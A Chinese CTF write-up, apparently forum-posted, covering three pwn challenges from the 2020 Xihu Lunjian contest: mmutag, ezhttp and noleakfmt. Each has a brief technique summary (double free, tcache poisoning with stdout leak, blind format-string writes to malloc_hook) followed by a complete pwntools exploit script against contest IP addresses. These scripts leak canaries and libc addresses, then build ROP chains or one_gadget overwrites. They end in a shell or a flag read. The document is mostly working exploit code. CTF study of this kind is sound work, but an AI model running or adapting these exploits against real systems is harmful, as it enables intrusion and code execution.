-
-
2020西湖论剑题目write up
-
2020-10-10 09:44
-
2020 西湖论剑题目 write up
mmutag
Double free分配chunk到stack中,然后改写ret地址,得到libc地址,进而覆盖ret地址为one_gadget
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 | #https://github.com/matrix1001/welpwnfrom PwnContext import *try: from IPython import embed as ipyexcept ImportError: print ('IPython not installed.')if __name__ == '__main__': context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send(str(data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs) # misc functions uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) ctx.binary = './pwn' #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64' ctx.remote = ('183.129.189.62', 60804) #ctx.remote_libc = './libc.so' #ctx.debug_remote_libc = True ctx.symbols = { 'node':0x6020C0, } ctx.breakpoints = [0x400AB5]#menu def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) def add(idx,content='\n'): sla('ise',1) sla('id',idx) sa('content',content) def delete(idx): sla('ise',2) sla('id',idx) def read_some(content): sla('ise',3) s(content) rs('remote') #dbg() name = '123' sla('name',name) ru('tag: ') stack = int(ru(':',drop=True),16) aim = stack-0x40 lg('stack',stack) #rs('remote') sla('ice',2) add(1) add(2) add(3) delete(1) delete(2) delete(1) read_some('a'*0x19) ru('a'*0x19) canary = uu64('\0' + r(7)) lg('canary',canary) read_some(p64(0x7f)*2+p64(stack-0x23)+'\0') dbg() add(4,p64(aim)) add(5) pop_rdi = 0x0000000000400d23 puts_plt = 0x4006B0 puts_got = 0x602020 #payload = '\0'*3 + p64(stack-0x20) + p64(0x0000000000400750) + p64(0x0000000000400b01) payload = 'a'*0x8 + p64(canary) payload += p64(stack+0x10) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x400A99) add(6) add(7,payload) sla('ise',4) ru('\n') libc_base = uu64(ru('\n',drop=True))-0x6f6a0#-ctx.libc.sym['puts'] lg('libc_base',libc_base) one = libc_base+ 0x45226 payload = '\0'*3 + p64(0)*1+p64(canary)+p64(0) + p64(one) add(8,payload) irt() |
ezhttp
2.27 先用tache atk改写控制结构,使得tcache bin数目超过7,然后利用unsortbin中残留的信息,爆破stdout,进而泄露libc/stack/prog地址,然后控制global_node结构,改写stack,最终进行rop,orw读取flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 | #https://github.com/matrix1001/welpwnfrom PwnContext import *try: from IPython import embed as ipyexcept ImportError: print ('IPython not installed.')if __name__ == '__main__': context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send(str(data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs) # misc functions uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) ctx.binary = './ezhttp.bak' #ctx.custom_lib_dir = '/home/rhl/Desktop/CTF/glibc-all-in-one/libs/2.23-0ubuntu10_amd64' #change the libs ctx.remote_libc = './libc-2.27.so' #only change the libc.so ctx.remote = ('183.129.189.61',56002) ctx.debug_remote_libc = True ctx.symbols = { 'node':0x203120 } ctx.breakpoints = [0x18CD,0x1753]#menu:0x18CD ,0x1A78,0x12CC ctx.debug() def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) def add(idx, content): payload = 'POST /create ' payload += 'Cookie: user=admin ' payload += 'token: '+'\x01\x0d' payload += '\r\n\r\n' payload += 'content=' + content sa('me',payload) def delete(idx): payload = 'POST /del ' payload += 'Cookie: user=admin ' payload += 'token: '+'\x01\x0d' payload += '\r\n\r\n' payload += 'index=' + str(idx) sa('me',payload) def edit(idx,content): payload = 'POST /edit ' payload += 'Cookie: user=admin ' payload += 'token: '+'1\r' payload += '\r\n\r\n' payload += 'index=' + str(idx) + "&" + 'content=' + content sa('me',payload) while True: try: rs() context.log_level = 'info' #rs('remote') #rs() add(0,'a'*0x10) ru('Your gift: ') heap_base = int(ru('\"',drop=True),16)-0x260 lg('heap_base',heap_base) delete(0) delete(0) payload = '\x05'*0x8+'\xff'*6+'\x05'*2 add(1,p64(heap_base+0x10)) add(2,'a'*0x8) add(3,payload) #dbg() add(4,'a'*0xa0) add(5,'a'*0xf0) delete(4) add(6,'\x60\xb7') #dbg() delete(1) edit(2,p64(heap_base+0x280)[:6]+'\n') #dbg() add(7,'a'*0x6) add(8,'\x80\xb7') add(9,p64(0xfbad3887)) #edit(6,'\x80\n') delete(7) edit(2,p64(heap_base+0x280)[:6]+'\n') #dbg() add(10,'a'*6) add(11,'\x80\xb7') #dbg() #add(11,'./flag') #add(12,'\x80') add(12,'a'*0x10) edit(12,'\x80\n') #''' ru('========\n') libc_base = uu64(r(8)) - 0x3ec780 lg('libc',libc_base) aim = libc_base+0x619f60 environ = libc_base+0x3ee098 lg('environ',environ) payload = p64(environ) + p64(environ+8)[:6] + '\n' edit(12,payload) ru('========\n') stack = uu64(r(8)) aim = stack-0x1940 lg('stack',stack) payload = p64(aim) + p64(aim+8)[:6] + '\n' edit(12,payload) ru('========\n') prog = uu64(r(8))-0x1afc lg('prog',prog) #dbg() node = prog+0x203120 #edit(12) delete(5) delete(5) add(13,'a'*0xf0) edit(13,p64(node)+p64(0)+'\n') add(14,'a'*0xf0) edit(2,'./flag\0\n') #dbg() payload = p64(aim) + p64(0xf0)+p64(heap_base+0x260)+p64(0x10)+'\n' add(15,'a'*0xf0) edit(15,payload) pop_rdi = libc_base + 0x000000000002155f pop_rsi = libc_base + 0x0000000000023e8a pop_rdx = libc_base + 0x0000000000001b96 open1 = libc_base+0x10fd50 read = libc_base+0x110180 write = libc_base + 0x110250 flag_addr = heap_base +0x260 heap_addr = heap_base + 0x1000 payload = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open1) payload += p64(pop_rdi) + p64(4 ) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x30) + p64(read) payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_addr) + p64(pop_rdx) + p64(0x30) + p64(write) payload += p64(0)+'\n' #dbg() edit(0,payload) irt() except KeyboardInterrupt: break except EOFError: continue |
noleakfmt
提供了stack地址,但是关闭了stdout输出,这种情况下利用fmt漏洞最多写0x2000字节左右。
起初打算利用stack区域中原有的跳板来做,如下图所示,但是经过测试得到跳板的栈区偏移是非固定的,所以跳板的偏移也不能确定,当时没有注意到跳板偏移不固定,时间也不够了就没有把这题做出来。
所以需要人为构造跳板,由于关闭了标准输出以后fmt只能写0x2000左右大小,当rsp后两字节小于0x1ff8的时候,可以将跳板的末尾两字节覆盖为rsp+8,解决了跳板的问题。
后面的思路就是利用stack区域中残留的libc信息,修改_IO_2_1stdout->_fileno为二,然后修改malloc_hook为one_gadget,最终printf输出长字符串调用malloc 进行get shell。
最终是需要爆破两个地方,概率大概是1/256
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 | #https://github.com/matrix1001/welpwnfrom PwnContext import *try: from IPython import embed as ipyexcept ImportError: print ('IPython not installed.')if __name__ == '__main__': context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send(str(data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop,timeout=0.3)# irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs) # misc functions uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) ctx.binary = './pwn' #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64' ctx.remote = ('183.129.189.61', 53905) #ctx.remote_libc = './libc.so' #ctx.debug_remote_libc = True ctx.symbols = { 'node':0x2022a0, } ctx.breakpoints = [0x985]#menu def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) while True: try: context.log_level = 'info' rs() #rs('remote') def calc(value,offset,fmt='hhn'): sl('%'+str(value)+'c%'+str(offset)+'$'+fmt+'\x00') #dbg() ru('gift : ') stack = int(r(14),16) if (stack-4)&0xffff > 0x1ff8 : continue num = (stack -4+8) & 0xffff # 7 lg('stack',stack) aim = stack + 0x31c - 0x30 -800 + 856 lg('aim',aim) #calc(0x2000,11,'hn') tmp0 = aim&0xff tmp1 = (aim&0xff00) >> 8 tmp2 = (aim&0xff0000) >> 8*2 tmp3 = (aim&0xff000000) >> 8*3 tmp4 = (aim&0xff00000000) >> 8*4 tmp5 = (aim&0xff0000000000) >> 8*5 tmp6 = (aim&0xff000000000000) >> 8*6 tmp7 = (aim&0xff00000000000000) >> 8*7 dbg() calc(num,11,'hn') calc(tmp0,37) calc(num+1,11,'hn') calc(tmp1,37) calc(num+2,11,'hn') calc(tmp2,37) calc(num+3,11,'hn') calc(tmp3,37) calc(num+4,11,'hn') calc(tmp4,37) calc(num+5,11,'hn') calc(tmp5,37,'n') #dbg() calc(num,11,'hn') calc(0x90,7) calc(tmp0+1,37) calc(0x26,7) calc(tmp0,37) calc(2,107) #dbg() #sleep(2) sl('%p %9$p') ru('0x') a = ru('0x') if len(a) == 0: continue libc = int(r(12),16) lg('libc',libc) malloc_hook = libc+0x3a42d0 one = libc-0x20840+0xf1207 aim = malloc_hook tmp0 = aim&0xff tmp1 = (aim&0xff00) >> 8 tmp2 = (aim&0xff0000) >> 8*2 tmp3 = (aim&0xff000000) >> 8*3 tmp4 = (aim&0xff00000000) >> 8*4 tmp5 = (aim&0xff0000000000) >> 8*5 tmp6 = (aim&0xff000000000000) >> 8*6 tmp7 = (aim&0xff00000000000000) >> 8*7 calc(num,11,'hn') calc(tmp0,37) calc(num+1,11,'hn') calc(tmp1,37) calc(num+2,11,'hn') calc(tmp2,37) calc(num+3,11,'hn') calc(tmp3,37) calc(num+4,11,'hn') calc(tmp4,37) calc(num+5,11,'hn') calc(tmp5,37,'n') calc(num,11,'hn') #dbg() calc(one&0xffff,7,'hn') calc(tmp0+2,37) calc((one&0xffff0000)>>16,7,'hn') calc(tmp0+4,37) calc((one&0xffff00000000)>>32,7,'hn') #dbg() sl('sh;%1000000c$hn;') sl('cat flag >& 2') irt() except KeyboardInterrupt: break except EOFError: continue |
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
最后于 2020-10-16 16:53
被Seclusion编辑
,原因:
|
|
|---|---|
|
|
|
|
|
|
|
|
好了 |
